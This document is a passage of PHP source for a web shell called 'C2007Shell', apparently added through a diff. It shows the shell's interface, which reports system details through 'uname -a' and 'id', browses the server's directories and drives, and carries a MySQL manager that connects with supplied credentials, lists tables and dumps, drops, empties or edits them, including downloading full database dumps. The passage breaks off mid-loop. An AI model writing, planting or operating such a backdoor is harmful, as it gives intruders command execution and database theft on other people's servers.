+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C2007Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p>
+    </center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+foreach($pd as $b) 
+{ 
+ $t = ""; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; 
+ $i++; 
+} 
+echo "&nbsp;&nbsp;&nbsp;"; 
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo "<b>".view_perms_color($d)."</b>"; 
+} 
+if (is_callable("disk_free_space")) 
+{ 
+ $free = disk_free_space($d); 
+ $total = disk_total_space($d); 
+ if ($free === FALSE) {$free = 0;} 
+ if ($total === FALSE) {$total = 0;} 
+ if ($free < 0) {$free = 0;} 
+ if ($total < 0) {$total = 0;} 
+ $used = $total-$free; 
+ $free_percent = round(100/($total/$free),2); 
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; 
+} 
+echo "<br>"; 
+$letters = ""; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range("a","z") as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes); 
+  if (!$bool) {$bool = is_dir($letter.":\\");} 
+  if ($bool) 
+  { 
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; 
+   if ($letter.":" != $v) {$letters .= $letter;} 
+   else {$letters .= "<font color=green>".$letter."</font>";} 
+   $letters .= " ]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?>
+    <h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3>
+    <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="Adora" maxlength="64"></td><td><input type="password" name="sql_passwd" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } 
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
